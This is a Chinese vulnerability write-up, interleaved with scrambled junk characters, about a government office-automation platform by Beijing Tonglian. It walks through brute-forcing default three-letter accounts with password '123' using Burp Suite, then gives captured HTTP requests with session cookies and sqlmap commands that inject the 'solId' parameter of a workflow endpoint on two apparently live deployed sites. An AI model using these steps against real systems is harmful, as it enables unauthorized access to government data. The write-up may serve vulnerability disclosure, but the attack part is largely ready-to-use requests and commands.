|
7 f" a6 E: K7 \' n/ p" Z5 z2 q - V* j5 N" w. D5 j$ V9 A- u
3 }1 `! Z! @0 _* u5 g! [( Y
1 W) A h) k- S5 R9 v" x
平台简介:
5 p; t, c6 J/ }" k6 V5 h 5 k$ M r# C# h& ^+ j, I
2 u: W) o" T `8 p/ x( I ! d6 P% q) h# q6 j+ r" E" s1 }2 ^6 r
# N! e1 E* G; Q1 z( ~( x
% I* @% Z+ n* ~+ P: s" b 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: A& g4 g s+ F$ j) q" c同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 / P1 y9 g }! G- s+ s, Z" p
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
( Q: s1 t- j) \$ b
( N" K; g; D: w- J" i2 F! X! @ V1 I p$ y7 _
& @) B: o; U- f- B
, a9 V, n z- C" S: J/ n0 g
* `0 F) T1 Q$ w% b2 c/ L2 i3 S' g
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
+ n8 T w ~( H3 W) g " A- z- S$ |+ _& n! u7 K
q' K ~, m) ?4 w" n
8 e% R' r4 S9 Z! P% S5 B
3 F/ x* q, z) y1 v# p8 u- d9 i
6 k6 Q5 m: s3 N http://1.1.1.1:7197/cap-aco/#(案例2-)1 a7 K# G- S/ m: j) Y+ I" u
w7 c U+ P7 g* n; k. ? A. v% J
* v2 ~* X" S3 ^2 q/ M
http://www.XXOO.com (案例1-官网网站)
6 t/ }& m6 T: W' z' T3 @1 \" H
% A% r$ t( R. D# G
2 r2 ?$ R; o0 w. x6 s1 K3 B: Q
+ P8 m p8 l6 g3 \4 k + J3 @" x, k( k2 [/ F- C' W3 P
4 S; ]# m: z8 X- T. e/ m
漏洞详情:4 g4 Q6 c, x* _( b ]* V
9 r( f; |# @( l8 j$ [) p3 P4 G
( Y2 R r* ?$ z4 z/ v- k' v 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
# W9 V3 l, a" a ( B& y9 Q# R# ^2 [; J2 a" B1 q7 w
! b% ]3 u" J+ ^9 `1 K. r9 S 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:2 ^& P9 u1 B- y- z0 C7 W1 F
8 s# G1 E9 K4 Q8 D# u/ v' g
, o" @- w. X5 ?- g5 }0 ~$ ^9 Q+ G
$ l6 H1 B0 x0 }& G+ e' y: r
0 _9 U) P4 a1 ~6 K2 v/ ^, L8 \9 N
3 x/ n( S6 R) r& y) L M( J9 ?1 w, s _# m; P! T; v- v- G
! O4 H# |* D0 v( S6 j0 a1 _8 x- {
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
, J! N4 {! J5 i' {. X
0 H; [9 c. R% f3 z R& r$ T3 O9 r; s* ?% |: t' [
1、案例1-官方网站
2 C9 F* R9 \/ U9 [/ s" ~& H: Z. ^ ) ~# [0 m* |2 g/ f
2 H$ p9 L- c9 _- V+ Y% m
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1% x/ _' ~( i6 V
4 [0 Z; {9 F1 b/ Q7 D
) |7 w/ u: N% m; Q8 T3 h" z% @' j Host: www.XXOO.com
9 |4 l4 M, U$ H! r% q 7 L3 R) c% d( d# W
: p* G' u# q$ u" H! z
Proxy-Connection: Keep-Alive
5 `" h. p2 Z5 D8 y# c8 j
* t2 U8 @/ [ r- x3 w& c! O6 I" j4 O: j* v0 @$ M2 J C+ v% ]3 }
Accept: application/json, text/javascript, */*; q=0.01! ~7 y0 y: I+ [4 Y0 O* g
* ]+ P/ o+ H% G1 p4 W* I+ M3 E0 w6 t/ e
Accept-Language: zh-CN
3 f E4 Z: X8 P3 \9 y c. A% V# V / q. ^/ S, w( Z- G' j! n
- C- C* P! N3 A) l
Content-Type: application/json3 }; Y' D8 b/ q/ X$ S' j3 r
! p4 J1 a# B5 n9 t( R' z( F
% \2 g/ @ z6 r/ `, v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
( d2 i7 M7 l/ b* d1 d
8 u; v# J4 h& N2 Z/ I" L3 l' H( _1 W- G# Z) \+ V1 ~" [: V% X
X-Requested-With: XMLHttpRequest8 }5 w3 T& {! a* [2 R
' k* [ P% ?+ }( i) l$ y/ k7 A- S
5 p5 l s4 l! p/ l
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
* z0 |: S/ C. P- E6 C/ W' S' l 0 A& `6 H- w, {5 d, q% W
! b/ A: F* V# G
Accept-Encoding: gzip, deflate, sdch, ?. Z$ w0 X( \& x, ? z' n
; Z" a: w' H0 |( H9 q6 f r
" A1 L( W' C& u& z, C8 @, y$ l& g3 S& B
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
+ j: ~0 M' T/ g- i0 W4 ~" } 8 A3 u; R! `, W: c' p
, z5 O* m. ]# G+ U
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
7 S! R8 X. Z/ A4 k0 `: _9 ]) k$ T/ s
) \& W6 J% v$ C- [ A$ ~ o& v6 p. O* q- x3 \! y$ ^/ Z
7 I; S) u) r1 `! x
1 D3 S+ p x. l0 ~; u
1 c1 _9 M5 w: a' K
% L$ \7 Z" V" F$ G - I3 x" @# a/ \! p3 U1 u
* R5 a" J. [6 O+ F% r
, C/ I$ f, E$ n F: U0 m ! J6 M: Z7 I# w0 i
* g* L( D h6 v- n" b' a& `
* {! y) u2 _4 W( K, h- O
4 w) d8 J1 {0 P% o k- H5 s8 n/ m8 G1 m3 u I. W+ B5 X# { [
B& N5 H7 f; l/ f 9 E' o" i* c# C, ?- h- a
' s g7 F' V, g 2、案例2-某天河云平台
; W9 B8 a7 `" q+ b- O e8 P- y- g6 u" N6 P# Z
" s: @5 ?3 _( {/ ] C- }
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
$ |" ^ n# g( q I 8 B1 [: W: Y8 I9 O C% R" M* y
: K3 K0 R( E: `0 Z M" u6 ~ Host: 1.1.1.:7197
8 s0 Z5 h H: K; E T9 L
9 D7 q3 R) G" f% ?: k0 x% }! c; r. t& q# R( j
Accept: application/json, text/javascript, */*; q=0.01! F$ M7 `# o8 x/ Z* m
4 |- R0 {7 E+ c3 f1 B9 t+ E7 O0 v5 k, ]7 Q3 C6 A0 D* X
X-Requested-With: XMLHttpRequest
" I% L7 `( o0 _/ a
/ F$ e: w1 o7 w I: C. }
a$ ^5 p" D* G User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
5 j R# d7 n! h+ I8 b0 Z( X 1 |* I# N% s: c2 h+ L4 r) y
* `% x# U0 Z5 _6 i$ {$ s/ N. P4 `
Content-Type: application/json
) y+ T7 ^- r! U; @6 j# d ( O0 c2 Y( j5 C$ W# R
1 w. O1 ^( z. Q# h4 `, \
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
' N2 P! M& a; k" W4 C% I0 @& M 8 u# Y( W5 P& q
7 V# X% m" U! v. A9 d4 s
Accept-Language: zh-CN,zh;q=0.8+ h3 c8 U& |1 c2 q0 m+ B( N+ f1 j. M
5 R/ O6 w" s" A c' w0 L5 B1 G# q9 `9 ^+ g# n
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
; e, q- W8 A- r- r2 r! C# e : a5 L6 q e/ t5 n" v* z5 |) G
' Z' f' x4 j/ o# g) z) i Connection: close
/ x8 s; }7 ?; k q) d; F: q ' x' e; P: x8 D* k3 g
( C" w2 C# F. I+ Q8 {4 c" I 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ [: A- G0 A# U1 A+ ]1 C
/ P9 G% n& d% I3 y; U3 C: s$ @; N
% M. f+ @' i9 R0 ^8 N. X: ~
' x6 J. H+ j9 _ q+ { 0 k1 N! b3 |; W9 w* m
# ? v |0 T$ l0 D/ _
# ]* k9 b8 ^ W, N) A% c2 u: w, Q
|